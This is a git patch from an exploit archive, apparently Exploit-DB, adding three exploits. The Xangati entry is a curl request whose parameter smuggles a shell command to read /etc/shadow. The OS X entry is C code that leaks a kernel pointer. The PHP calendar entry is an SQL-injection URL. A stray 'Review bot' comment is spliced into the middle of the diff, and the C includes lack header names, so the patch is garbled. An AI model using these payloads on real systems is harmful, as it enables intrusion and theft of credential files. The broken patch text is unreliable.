From cf0225763fa02b0896885a17e339fe803b2dbafc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 2 Jan 2016 05:02:02 +0000
Subject: [PATCH] DB: 2016-01-02 3 new exploits
---
 files.csv | 3 +++
 platforms/cgi/webapps/39145.txt | 12 ++++++++++++
 platforms/osx/local/39147.c | 34 +++++++++++++++++++++++++++++++++
 platforms/php/webapps/39146.txt | 9 +++++++++
 4 files changed, 58 insertions(+)
 create mode 100755 platforms/cgi/webapps/39145.txt
 create mode 100755 platforms/osx/local/39147.c
 create mode 100755 platforms/php/webapps/39146.txt
diff --git a/files.csv b/files.csv
index ccf7bf2c0..190effe1d 100755
--- a/files.csv
+++ b/files.csv
@@ -35392,3 +35392,6 @@ id,file,description,date,author,platform,type,port
 39141,platforms/php/webapps/39141.txt,"eazyCMS 'index.php' SQL Injection Vulnerability",2014-04-09,Renzi,php,webapps,0
 39142,platforms/jsp/webapps/39142.txt,"Xangati /servlet/MGConfigData Multiple Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
 39143,platforms/jsp/webapps/39143.txt,"Xangati /servlet/Installer file Parameter Remote Path Traversal File Access",2014-04-14,"Jan Kadijk",jsp,webapps,0
+39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
+39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
+39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
diff --git a/platforms/cgi/webapps/39145.txt b/platforms/cgi/webapps/39145.txt
new file mode 100755
index 000000000..6582617ad
--- /dev/null
+++ b/platforms/cgi/webapps/39145.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/66819/info
+
+Xangati XSR And XNR are prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input data.
+
+An attacker may leverage this issue to execute arbitrary commands in the context of the affected application.
+
+Xangati XSR prior to 11 and XNR prior to 7 are vulnerable.
+
+curl -i -s -k -X 'POST' \
+-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
+--data-binary $'key=validkey&falconConfig=validateTest&path=%2Fvar%2Ftmp%2F¶ms=gui_input_test.pl¶ms=-p+localhost;CMD%3d$\'cat\\x20/etc/shadow\';$CMD;+YES' \
+'hxxps://www.example.com/servlet/Installer'
diff --git a/platforms/osx/local/39147.c b/platforms/osx/local/39147.c
new file mode 100755
index 000000000..cd0700c63
--- /dev/null
+++ b/platforms/osx/local/39147.c
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/67023/info
+
+Apple Mac OS X is prone to a local security-bypass vulnerability.
+
+Attackers can exploit this issue to bypass certain security restrictions and perform unauthorized actions.
+
+Apple Mac OS X 10.9.2 is vulnerable; other versions may also be affected.
+
+#include
+#include
+#include
+
+int main(int argc, char *argv[])
+{
+ int shm = shmget( IPC_PRIVATE, 0x1337, SHM_R | SHM_W );
+
+ if (shm < 0)
+ {
+ printf("shmget: failed");
+ return 6;
+ }
+
+ struct shmid_ds lolz;
+
+ int res = shmctl( shm, IPC_STAT, &lolz );
+ if (res < 0)
+ {
+ printf("shmctl: failed");
+ return 1;
+ }
+
+ printf( "%p\n", lolz.shm_internal );
+
+}
diff --git a/platforms/php/webapps/39146.txt b/platforms/php/webapps/39146.txt
new file mode 100755
index 000000000..fb216ac5d
--- /dev/null
+++ b/platforms/php/webapps/39146.txt
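Review bot: The three `#include` directives at the top of the C body in platforms/osx/local/39147.c have no header names, so the file as committed does not compile; the names were most likely stripped when the advisory was rendered to text and should be restored from the original posting (standard I/O plus the SysV IPC/shared-memory headers) so the archived record is faithful. The advisory prose that precedes the includes is also part of the file body, so even with the headers restored the record is not a compilable unit without trimming, which is worth a one-line note at the head of the file. Both failure branches print `"shmget: failed"` / `"shmctl: failed"` without a trailing newline and discard errno; `perror("shmget");` and `perror("shmctl");` would report the actual cause. `main` falls off its end without a `return`, which C99 treats as returning 0, so the exit status only distinguishes the two failure paths.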
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/66923/info
+
+Jigowatt PHP Event Calendar is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Jigowatt PHP Event Calendar 2.16b is vulnerable; other versions may also be affected.
+
+http://www.example.com/code/calendar/day_view.php?day=23&month=4&year=[SQL injection]
\ No newline at end of file